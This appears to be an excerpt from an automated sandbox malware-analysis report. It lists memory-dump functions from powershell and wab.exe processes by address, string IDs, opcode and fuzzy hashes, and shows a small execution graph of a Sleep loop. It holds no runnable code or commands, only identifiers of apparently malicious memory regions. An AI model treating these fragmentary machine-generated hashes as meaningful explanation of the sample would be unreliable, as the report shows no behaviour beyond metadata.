                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: 4ca8e5cc1b55be002d927210a203253339608c2885e48dbd38dc195a1d651ca0
                                                • Instruction ID: c3e5af164bef4a26c5faff53fe1fe1ecb8a4491d68b0db72e89bd464533e59ce
                                                • Opcode Fuzzy Hash: 4ca8e5cc1b55be002d927210a203253339608c2885e48dbd38dc195a1d651ca0
                                                • Instruction Fuzzy Hash: E6419D35704316ABCB276A78441477ABBA65BD8320F2D48FBC4928B781CB31CC82C352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003896A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $p$$p$$p$$p
                                                • API String ID: 0-3121760203
                                                • Opcode ID: 5f9dd85b326fcf2b26a5d8fa1c193afb451205cb2228d69f6a059ecd7c372abb
                                                • Instruction ID: 72ee3a82d0639e1dfbd738a28c0faca053e1ce9e90df672fae8afd40e6927b2d
                                                • Opcode Fuzzy Hash: 5f9dd85b326fcf2b26a5d8fa1c193afb451205cb2228d69f6a059ecd7c372abb
                                                • Instruction Fuzzy Hash: 9121E2357243016BDB26396A9840B3BAADA9BC4710F7C84BBF546CB285DEB5DC41C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003819B0 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x;)$x;)$$p$$p
                                                • API String ID: 0-1346616721
                                                • Opcode ID: c377aaa28562d9467087f28cad0acedbbb86edf345ad218c4f063602b7ffc418
                                                • Instruction ID: 17a681ca312c3736799265608ce696475cc51e08497a0c19fa1e118ad37f18de
                                                • Opcode Fuzzy Hash: c377aaa28562d9467087f28cad0acedbbb86edf345ad218c4f063602b7ffc418
                                                • Instruction Fuzzy Hash: 112126252093806FDB37163588117667FAD8F86310F2E40EBD895DB2C3D569CD46C321
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038AD1C Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $p$$p$$p$$p
                                                • API String ID: 0-3121760203
                                                • Opcode ID: 583677861f1b8bdb62774c26413184860e42c622fcb9e48655ebf6d287b1a81f
                                                • Instruction ID: 4b3dc6d34857d1dc737ea3606eccde59153ee0fc6c857fcb6ca83f443a700cc0
                                                • Opcode Fuzzy Hash: 583677861f1b8bdb62774c26413184860e42c622fcb9e48655ebf6d287b1a81f
                                                • Instruction Fuzzy Hash: F5210335A04B41DFEB27AE64C45027ABFB0AF91312F6A44EBD844C7A52D331D949C793
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00380570 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$$p$$p
                                                • API String ID: 0-377911355
                                                • Opcode ID: 59580e306c9e78e210dcf58e236d1a8f6d1c72ad8cb18b3023260e98fa1ae121
                                                • Instruction ID: 7d3166ad09b48cb0524aea0a58cdfad51043454c0b7cd0e4806a9663d703fc0e
                                                • Opcode Fuzzy Hash: 59580e306c9e78e210dcf58e236d1a8f6d1c72ad8cb18b3023260e98fa1ae121
                                                • Instruction Fuzzy Hash: BA01F921B0D3805FC76F266C941162A9FA2ABD3750B6D00EBD491DB282CD54CC5BC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:31.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 12 3f2293a 13 3f2297b 12->13 13->12 14 3f2299e Sleep 13->14 14->12

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_03F2293A 1 Function_03F221FC 0->1

                                                Executed Functions

                                                Function 03F2293A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.746084860.0000000003E9B000.00000040.00000400.00020000.00000000.sdmp, Offset: 03E9B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_3e9b000_wab.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: 0^r
                                                • API String ID: 3472027048-1251071597
                                                • Opcode ID: fa6f852e71e780f5051848a4d0155528b00c07f2d17a691155b89a5d111ffd0f
                                                • Instruction ID: 3b348af2643701b217fe3a882b414d6bbd6130e8555e7b693e554249b1054654
                                                • Opcode Fuzzy Hash: fa6f852e71e780f5051848a4d0155528b00c07f2d17a691155b89a5d111ffd0f
                                                • Instruction Fuzzy Hash: C0117AB2904311EFE784CF31CC8CB66B760BF10394F4A819899154F0A6D378C480CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:31.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 12 3f2293a 13 3f2297b 12->13 13->12 14 3f2299e Sleep 13->14 14->12

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_03F2293A 1 Function_03F221FC 0->1

                                                Executed Functions

                                                Function 03F2293A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.770994158.0000000003E9B000.00000040.00000400.00020000.00000000.sdmp, Offset: 03E9B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_3e9b000_wab.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: 0^r
                                                • API String ID: 3472027048-1251071597
                                                • Opcode ID: fa6f852e71e780f5051848a4d0155528b00c07f2d17a691155b89a5d111ffd0f
                                                • Instruction ID: 3b348af2643701b217fe3a882b414d6bbd6130e8555e7b693e554249b1054654
                                                • Opcode Fuzzy Hash: fa6f852e71e780f5051848a4d0155528b00c07f2d17a691155b89a5d111ffd0f
                                                • Instruction Fuzzy Hash: C0117AB2904311EFE784CF31CC8CB66B760BF10394F4A819899154F0A6D378C480CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%